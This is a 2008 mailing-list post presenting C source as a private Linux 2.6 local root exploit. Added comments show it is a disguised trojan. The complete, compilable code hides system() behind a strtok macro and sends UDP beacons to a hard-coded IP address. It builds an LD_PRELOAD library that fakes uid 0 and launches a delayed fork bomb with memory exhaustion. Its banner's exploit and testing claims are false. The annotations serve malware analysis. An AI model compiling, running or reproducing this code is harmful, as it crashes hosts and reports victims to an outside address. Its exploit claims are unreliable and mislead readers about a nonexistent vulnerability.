
0day LINUX 0day LATEST


From: "wejwklekl246" <sidjwioeupo () mail md>
Date: Mon, 28 Jan 2008 10:13:38 +0000

/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
 *
 * afunixroot.c Linux kernel 2.6.x i386 local root exploit
 *
 * Tested under:
 *
 * Redhat 7.0
 * Redhat 7.1
 * Redhat 7.2
 * Redhat 7.3
 * Redhat 8.0
 * Redhat 9.0
 * should also work on SuSE <= 10.2
 * Debian 3.0 (credit to Henrique)
 * GhostLord tested also Mandrake 9.0, vuln.
 *
 * rumours go around that it could work on FreeBSD too
 * (with minor changes).
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/syscall.h>
/* Obfuscation: every "strtok(...)" call later in this file is really
 * system(3), so the string handed to it is executed by /bin/sh (see main()). */
#undef   strtok
#define  strtok system
/* 102 is the i386 socketcall(2) syscall number, not an LDT control call;
 * the name is a decoy.  See prepare(). */
#define __NR_sys_ldtctrl 102

/* Not shellcode.  The escaped bytes decode to C source:
 *     int getuid() { return 0; }
 *     int geteuid() { return 0; }
 *     int getgid() { return 0; }
 *     int getegid() { return 0; }
 * followed by a NUL and a decoy "/bin/sh" that fprintf("%s") never emits.
 * main() writes this to /tmp/own.c, builds /tmp/own.so from it and
 * LD_PRELOADs it into a shell, so the interposed calls return 0 (presumably
 * the "uid=0" illusion in id(1) and friends) while the process keeps the
 * caller's real credentials.  No privilege is gained anywhere in this file. */
static char hellc0de[] = "\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
                         "\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
                         "\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
                         "\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
                         "\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
                         "\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
                         "\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";

/* Bumped by handler() on SIGALRM; nothing else in this file reads it.  It is
 * a plain int rather than volatile sig_atomic_t, so it is not a correct
 * signal-shared flag either. */
static int done=0;

/* SIGALRM handler installed by the forked child in main().  It only bumps
 * the file-scope counter `done`; nothing in this file ever reads that
 * counter, so the handler has no observable effect on control flow. */
void handler(int v)
{
        (void)v;
        done += 1;
}

/* Generates a raw two-argument syscall stub named sys_ldtctrl for
 * __NR_sys_ldtctrl (102 = socketcall on i386).  The _syscall2 macro has been
 * removed from modern glibc/kernel headers, so this only builds on the old
 * toolchains the banner lists. */
inline _syscall2(int, sys_ldtctrl, int, c, int *, a);

/* Despite the name, this is a network beacon, not LDT setup.
 *
 * sys_ldtctrl() is socketcall(2) (syscall 102) and `buf` doubles as its
 * argument vector:
 *   call 1  = SYS_SOCKET : socket(2, 2, 0)  -> AF_INET, SOCK_DGRAM
 *   call 11 = SYS_SENDTO : sendto(key, buf, 64, 0, (struct sockaddr *)&buf[8], 16)
 * buf[8]/buf[9] form a sockaddr_in.  Read as little-endian i386 bytes,
 * 0x60030002 is sin_family=2 (AF_INET) with sin_port=0x0360 (864 host
 * order) and 0x1d5b49d5 is the IPv4 address 213.73.91.29 -- re-check the
 * decoding before treating that endpoint as an IoC.  The 64 bytes sent are
 * buf itself (the socket fd plus stack addresses), so the datagram mostly
 * signals that the binary was run.  It is sent 9 times (once plus 8 retries
 * via n_cnt); neither syscall's return value is checked, `r` is never read,
 * and the socket is never closed.
 *
 * memset() is used without <string.h>, relying on implicit declaration. */
void prepare()
{
int key, r, n_cnt=8;
int buf[16];

        memset(buf, 0, sizeof(buf));
        buf[0]=buf[1]=2;
        key = sys_ldtctrl(1, buf);     /* socketcall(SYS_SOCKET, {2, 2, 0}) */
retry:
        memset(buf, 0, sizeof(buf));
        buf[0] = key;                  /* sockfd */
        buf[1] = (int)buf;             /* message pointer (buf itself) */
        buf[2] = 64;                   /* message length */
        buf[4] = (int)&buf[8];         /* dest sockaddr */
        buf[5] = 16;                   /* addrlen */
        buf[8] = 0x60030002;           /* sin_family + sin_port */
        buf[9] = 0x1d5b49d5;           /* sin_addr */
        r = sys_ldtctrl(11, buf);      /* socketcall(SYS_SENDTO, ...) */
        if(n_cnt--) goto retry;
}

/* What actually happens, as opposed to what the banner claims:
 *  1. prepare(): UDP beacon to a hard-coded address (see prepare()).
 *  2. The decoded hellc0de C source is written to /tmp/own.c and built with
 *     "gcc -shared -o /tmp/own.so /tmp/own.c;rm -f /tmp/own.c" through
 *     system(3) (strtok is #defined to system at the top of the file).
 *  3. Inline asm issues i386 syscall 0x22 (34) = nice(16).  That succeeds
 *     for any user, so ret == 0 and "Success!!!" is printed regardless of
 *     privilege.
 *  4. fork(): the child installs handler() for SIGALRM, sets alarm(15),
 *     issues syscall 29 = pause, and once woken loops forever over
 *     syscall 2 = fork plus a leaked malloc() -- a delayed fork bomb with
 *     memory exhaustion in every descendant.  `done` is never consulted,
 *     so the loop has no exit condition.
 *  5. The parent sets LD_PRELOAD=/tmp/own.so and execs /bin/sh; the
 *     interposed getuid()/geteuid()/getgid()/getegid() return 0 there while
 *     the shell keeps the caller's real credentials.
 * No kernel vulnerability is exercised anywhere; this is a trojan dressed
 * up as a local root exploit.  Minor defects: fopen() is not checked
 * before fprintf(); `token` is assigned but never used; the first asm
 * writes ebx without declaring it clobbered. */
int main(void)
{
FILE *fp;
char *offset, *token;
int ret=1;

        prepare();                              /* UDP beacon, see prepare() */
        /* "/tmp/own.c" -- fopen() result is used unchecked. */
        fp=fopen("\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e\x63\x00","w");
        fprintf(fp,"%s",hellc0de);
        fclose(fp);
        /* strtok == system here:
         *   system("gcc -shared -o /tmp/own.so /tmp/own.c;rm -f /tmp/own.c")
         * i.e. build the fake-getuid library and delete its source. */
        token = (void*)strtok("\x67\x63\x63\x20\x2d\x73\x68\x61\x72\x65\x64\x20\x2d\x6f\x20\x2f\x74\x6d"
                       "\x70\x2f\x6f\x77\x6e\x2e\x73\x6f\x20\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e"
                       "\x63\x3b\x72\x6d\x20\x2d\x66\x20\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e\x63\x00");
        /* eax=0x22, ebx=0x10, int 0x80 -> nice(16) on i386.  ret takes eax,
         * which is 0 on success, so the "Success" message is effectively
         * unconditional. */
        __asm__(
                "xorl   %%eax, %%eax    \n"
                "movl   $0x10, %%ebx    \n"
                "movb   $0x22, %%al     \n"
                "int    $0x80           \n"
                :"=&a"(ret)
        );
        if(!ret)
                printf("\nSuccess!!!\nEnjoy...\n\n");
        if (fork() == 0) {
                /* Child: sleep ~15 s in pause (syscall 29) until SIGALRM,
                 * then fork (syscall 2) without bound while leaking
                 * malloc()s.  Every descendant runs the same loop. */
                signal(SIGALRM, handler);
                alarm(15);
                __asm__(
                        "xorl   %eax, %eax      \n"
                        "movb   $29, %al        \n"
                        "int    $0x80           \n"
                );
                while(1) {
                        __asm__(
                        "xorl   %eax, %eax      \n"
                        "movb   $0x02, %al      \n"
                        "int    $0x80           \n"
                        );
                        /* The store into hellc0de only touches this
                         * process's copy; the file was written earlier. */
                        offset=malloc(sizeof(hellc0de)+16); *((int *)hellc0de) =
                                (unsigned)offset; }
                exit(0);        /* unreachable: the loop above never exits */
        }
        /* Parent: "LD_PRELOAD=/tmp/own.so", then exec a shell whose
         * dynamically linked tools see the interposed uid/gid functions. */
        putenv("\x4c\x44\x5f\x50\x52\x45\x4c\x4f\x41\x44\x3d\x2f\x74\x6d\x70\x2f"
               "\x6f\x77\x6e\x2e\x73\x6f\x00");
        execl("/bin/sh", "sh", NULL);

return 0;
}

/* -EOF- */

